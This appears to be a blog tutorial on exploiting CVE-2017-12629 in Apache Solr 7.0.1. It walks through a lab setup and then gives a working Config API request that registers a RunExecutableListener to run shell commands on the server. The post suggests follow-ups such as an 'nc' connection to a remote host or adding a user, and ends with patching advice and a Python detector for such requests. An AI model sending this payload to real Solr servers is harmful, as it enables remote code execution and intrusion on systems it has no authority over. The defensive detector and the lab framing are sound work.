How to Attack Apache Solr By Using CVE-2017-12629

Introduction

Apache Solr is highly reliable, scalable and fault tolerant, providing distributed indexing, replication and load-balanced querying, automated failover and recovery, centralized configuration and more. More information is available from the Apache Solr project documentation.

This article shows how CVE-2017-12629 can be used to attack it.

Test Environment

Apache Solr Server: Ubuntu 16.04

Apache Solr: 7.0.1

Zookeeper: 3.4.6

Setup Test Environment

1. Install Java 8

sudo apt-get install python-software-properties
sudo apt-get install software-properties-common
sudo add-apt-repository ppa:webupd8team/java
sudo apt-get update
sudo apt-get install oracle-java8-installer

2. Download Zookeeper 3.4.6

wget https://archive.apache.org/dist/zookeeper/zookeeper-3.4.6/zookeeper-3.4.6.tar.gz

3. Set up and start Zookeeper (zkServer.sh is run from inside the extracted directory)

tar zxvf zookeeper-3.4.6.tar.gz
cp zookeeper-3.4.6/conf/zoo_sample.cfg zookeeper-3.4.6/conf/zoo.cfg
cd zookeeper-3.4.6
sudo bin/zkServer.sh start
cd ..

4. Download Apache Solr 7.0.1

wget https://archive.apache.org/dist/lucene/solr/7.0.1/solr-7.0.1.zip

5. Set up and start Apache Solr, pointing it at the Zookeeper instance started above

unzip solr-7.0.1.zip
cd solr-7.0.1
bin/solr start -z localhost:2181

How to Attack Apache Solr

  • Create a Collection (the request below targets a collection named “Test”)

  • Using CVE-2017-12629 to attack

Using Burp Suite to submit the payload; this payload creates a file named remote.sh in the “/tmp” folder.

POST /solr/Test/config HTTP/1.1
Host: xx.xx.xx.xx:8983
Connection: close
Content-Type: application/json
Content-Length: 338

{
   "update-listener": {
       "event": "postCommit",
       "name": "shell5",
       "class": "solr.RunExecutableListener",
       "exe": "sh",
       "dir": "/bin/",
       "args": ["-c", "touch /tmp/remote.sh; echo 'gnome-terminal -t \"remote shell\" -x bash -c \"sh/tmp/test.sh;exec bash;\"'> /tmp/remote.sh"]
    }
}

  • Update the Listener to trigger the malicious script

Please notice that we have to update the listener, otherwise the malicious script will not be created.

Afterwards, we can find that the malicious script (remote.sh) has been created on the server side.

Summary

CVE-2017-12629 can be used to attack a server remotely. During the example attack, we created a .sh file on the server. This means that more dangerous Linux script files can be created in the same way; for example, a .sh file that runs the “nc” command to connect to a remote server, or one that adds a new user.

Because the parameters “exe”, “args” and “dir” can be crafted through the HTTP request that modifies the collection’s config, anybody who can send an HTTP request to the Solr API is able to execute arbitrary shell commands when the “postCommit” event is fired. For a remote attacker this amounts to arbitrary remote code execution.

This security issue is rated Critical, with a CVSS v3 base score of 9.8. I highly recommend updating the software to the latest version, and not running it as the root user.
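Since the abuse is visible in the Config API request itself, a proxy, WAF or log scanner can flag it before any event fires. The following is an added detection example, not code from the original post or from the Solr project: it parses the JSON body of a POST to /solr/<collection>/config and reports any add-listener or update-listener entry whose class is RunExecutableListener, together with the exe, dir and args it would run. The sample body is constructed here and uses a harmless command in place of the payload above.

```python
import json

# Class names Solr resolves for this listener (short alias and fully qualified).
DANGEROUS_CLASSES = {"solr.RunExecutableListener",
                     "org.apache.solr.core.RunExecutableListener"}
LISTENER_COMMANDS = ("add-listener", "update-listener")


def find_executable_listeners(body: str) -> list:
    """Return one finding per RunExecutableListener in a Config API JSON body.

    Each finding records the command used and the exe/dir/args the listener
    would run on its event. Invalid or non-object JSON yields no findings.
    """
    try:
        doc = json.loads(body)
    except json.JSONDecodeError:
        return []
    if not isinstance(doc, dict):
        return []
    findings = []
    for cmd in LISTENER_COMMANDS:
        value = doc.get(cmd)
        # Accept a single listener object or a list, so neither shape slips past.
        for listener in value if isinstance(value, list) else [value]:
            if isinstance(listener, dict) and listener.get("class") in DANGEROUS_CLASSES:
                findings.append({
                    "command": cmd,
                    "name": listener.get("name"),
                    "event": listener.get("event"),
                    "exe": listener.get("exe"),
                    "dir": listener.get("dir"),
                    "args": listener.get("args", []),
                })
    return findings


# Constructed sample body, shaped like the request above but with a benign command.
SAMPLE_BODY = json.dumps({
    "update-listener": {
        "event": "postCommit",
        "name": "shell5",
        "class": "solr.RunExecutableListener",
        "exe": "sh",
        "dir": "/bin/",
        "args": ["-c", "id > /tmp/marker"],
    }
})

if __name__ == "__main__":
    for f in find_executable_listeners(SAMPLE_BODY):
        print(f"ALERT {f['command']} name={f['name']} event={f['event']}: "
              f"{f['dir']}{f['exe']} {f['args']}")
```

The same function can be pointed at a collection's stored config overlay to audit listeners that were added before monitoring was in place.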

There is another article about an Apache security issue (CVE-2017-7659).

Reference

https://www.exploit-db.com/exploits/43009/
https://nvd.nist.gov/vuln/detail/CVE-2017-12629